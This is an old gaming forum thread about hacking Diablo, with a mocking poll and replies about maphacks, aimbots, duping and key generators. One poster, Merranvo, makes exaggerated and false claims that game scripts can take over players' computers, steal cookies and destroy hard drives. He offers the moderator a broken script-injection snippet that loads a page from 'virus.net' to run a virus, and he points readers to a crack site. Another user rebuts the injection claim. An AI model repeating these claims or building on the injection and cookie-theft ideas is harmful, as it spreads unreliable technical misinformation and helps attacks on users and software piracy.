Hacking and Other Stuff

No question, Just Grade ME

• You are INSANE, I hope you get ARRESTED!!

Votes: 5 35.7%
  • Interesting, but what is the point?

Votes: 5 35.7%
  • AWSOME, you are totally cool man!

Votes: 2 14.3%
  • You need to get a life and stop ATTACKING this BOARD

Votes: 8 57.1%
  • Well, I suck, so I am going to say you're screwed up

• WHO ARE YOU, How do you know this???

• Can you hack? That would Be totaly Awsome man.

Votes: 3 21.4%

• Total voters

Merranvo

Reaction score
Website
Visit site
:lucifer
Diablo is the bigest hacked game curently. Why, because it is easy. All you do is exploit the Message Box, Trade Box, or even the download area which downloads game information all the time. All a Hacker has to do is have a scipt "piggy-back" on the signal. Easy. The scipt will run on the other side, diablo typicaly does this, and wah-la, you can access another persons computer. Now here is where people mess it up, why steal accounts when you can steal identitys? Simply having the script copy all the cookies and send them back is effective enough, then why even do that, kill the hard drive, and have fun doing so. Those of you who have been hacked should be consitered lucky. HOWEVER most likely you were hacked because you password is ILOVESAM or MYDOGISBURT. Use passwords such as 879Wha76DARN these are harder to be hacked and probally won't be.
Now about this form. To the moderator, you can easyly create a code that can steal information from all computers by using the scipting command. simply refer to a site you set-up that has the malicius code on it.
example : I apologise if this scipting event does not work i never knew that you wanted to kill other people computers
<script>
new func goTo(newVar)
loadpage('newVar')
<scipt>
<body onLoad="goTo('http:\\virus.net\myvirus.htm') ;">
if you add the (code) statments
AND fix my code you will have a potential thread that will execute a virus when you click on it.
a tip, for Java Script alerts, press esc to rush though them.
More so, never use things like Onlyers NoCD prog, it allows multiple backdoors since it does not update with the rest of the program. Also, For those of you who insitst on finding a KEY GEN. there is none. All the key gens out there are nothing but a list of known keys put into a program, just record one key and generate 20 times, it WILL occur again. HOWEVER for those of you with NONSTOLEN SOFTWARE, or friends who have the REAL diablo, call tech support and they will give you a 15$ cd-key that works on Battle.Net.
If anyone finds a REAL key-gen, let me know, i don't belive that anyone will atempt to decode the algoritm.
go to www.ai.crack.cd for real cracks

Merranvo

Reaction score
Website
Visit site
Code:
<script>
alert("SAY IT LOOOOOOOOOOOUUUUUUUUUUD, I AM BORED AND PROUD")
</script>

ChrisH36

Guy with Most Posts on Quiet Board.
Reaction score
The hack i used to use was Diablo v1.09's Maphack, it helped me identify monsters and i knew how to customize it and everything.

But then I didn't really need it, I am going to write a statement of my opinion on my website when it is up and running, so i will link it and let others see it.

It will be about Diablo 2 and how hacking has robbed it a meaning of a game.

Entos

Member!
Reaction score
Website
entos.at.tt
you cant put html code into ur posts/sig or w/e because the forum doesnt read the code as a code but jsut as text. so u couldnt steal an admins password or w/e by just creating a new thread.
and about diablo: all packets u send are sent to the SERVER, then the server sends packets accordingly to the other players. when u send an non-legit packet, u get booted of the server(c/i, r/d, wna).

and BTW: jedi knight dark forces II is more hacked than diabblo... trust me :p

and why was diablo 1 so easy to hack? cuz all player information was stored on ur hard, so a program (like doomgaze) just had to edit that in order to change stats, dupe, or w/e.

ChrisH36

Reaction score
Because Diablo 1 had shitty security precautions and the accounts had files in the computer that were easy to dupe.
Most accounts in that game contain rigged characters that use lvl 20 fireballs and other powerhouse attacks.

But Diablo 2 v1.09 was hacker land. I owned Maphack and I knew how to work the code in it to make it more effective. But inv1.09 it was all about trading and the fact people spent REAL money on items that were probably corrupted.

Kao

Drives an Evo IX ;)
Reaction score
Lol what a ****ing moron..Really, if it is so easy to hack, why bother? It's not a challenge if everyone can do it. Why don't you people spend your time doing something productive?

Merranvo

Reaction score
Website
Visit site
Because production kills buisness, don't argue think, if all buisness' were more productive they would become equly productive a sometime, then they would kill each other out because there is no competition. There is a limmit to productiveness, there is no limit to hacking.
Besides, i was just trying to make a statment, so who CARES if overegagerated a LITTLE. In the end, if you know enough programming, have a few programs to help you, and such, you can hack

ReachProtoss

Member!
Reaction score
Website
Visit site
Yo,Merranvo, get on ladder, see how hacked it is? yeah, its not my point. get on open? everythings hacked, thats the point... thats y blizz dont mess with open, its a free for all. and d2 isnt the most hacked game out there.. u play counter strike? unreal touny? i got auto aimer for both and invis hack, cant touch me .. thats hacked.

ChrisH36

Reaction score
Originally posted by Kao
Lol what a ****ing moron..Really, if it is so easy to hack, why bother? It's not a challenge if everyone can do it. Why don't you people spend your time doing something productive?
BTW. I used maphack to find monsters to level up

Rushing is a big problem too, I would make games that were in v109 and lvl 2s in hell would come and ask me for free stuff and hacks, hell one guy wanted to dupe my Stealskull (perfect mf) and he told me to leave it at Gheeds and go to the Den of Evil, i left 1 gold there :D